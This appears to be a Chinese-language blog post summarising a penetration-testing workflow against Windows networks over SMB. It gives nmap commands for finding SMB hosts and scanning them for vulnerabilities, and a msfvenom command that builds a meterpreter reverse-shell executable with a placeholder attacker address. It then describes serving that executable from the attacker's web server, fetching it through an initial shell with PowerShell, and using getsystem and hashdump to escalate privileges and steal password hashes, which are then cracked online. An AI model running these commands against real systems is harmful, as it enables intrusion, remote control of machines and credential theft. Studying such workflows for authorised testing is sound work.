渗透测试思路一些总结

整体思路转自:paper.tuisec.win/detail-119767e6b79612b.html 

扫描C段或B段网段存活主机,www.jianshu.com/writer#/notebooks/11379001/notes/15623216

或利用nmap扫描存在smb服务的主机(这里主要测试存在smb漏洞的主机)

nmap -A -p 139,445 x.x.x.1-254 -oG smb_service.txt

其中,-A 代表扫描版本号和系统

-oG 输出到文件

cat smb_service.txt | grep 'windows' | cut -d " " -f2 > smb_service_host.txt

渗透测试思路一些总结_第1张图片
cut命令类似于awk的作用,-d 分隔符,-d " "以空格为分隔标志。-f 2选择第二个

扫描存在smb漏洞的主机

find / -name smb*vuln*.nse 查找nse脚本文件

for vul in$(find / -name smb*vuln*.nse | cut -d"/"-f 6);do nmap -v -p 139,445 --script=$vul -iL smb_server_host.txt -oN smb_vulns_$vul.txt;done

nmap -iL 输入文件

-oN 输出文件

渗透测试思路一些总结_第2张图片

漏洞利用

渗透测试思路一些总结_第3张图片

若成功,则返回shell

但此shell不稳当,要想办法获得meterpreter,获得更强大的功能

后渗透

得到初步的shell后,检查目标系统的操作系统版本,以生成对应版本的木马

渗透测试思路一些总结_第4张图片

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f exe -a x64 --platform win -o mp_64.exe

上传meterpreter的木马到攻击机的/var/www/html下,方便下载

重新开启一个msfconsole并开启监听。

渗透测试思路一些总结_第5张图片

重要一步:利用不稳当的shell创建一个powershell用于下载我们的meterpreter木马

ps怎么写?(还未研究)

仿照原文作者大牛写的,

渗透测试思路一些总结_第6张图片

下载成功,运行木马文件l.exe,成功获得meterpreter

meterpreter后渗透,getuid,getsystem(提权)、shell获取shell,hashdump获取hash密码,并可通过http://www.objectif-securite.ch/en/ophcrack.php一个在线的LMHash破解网站

你可能感兴趣的:(渗透测试思路一些总结)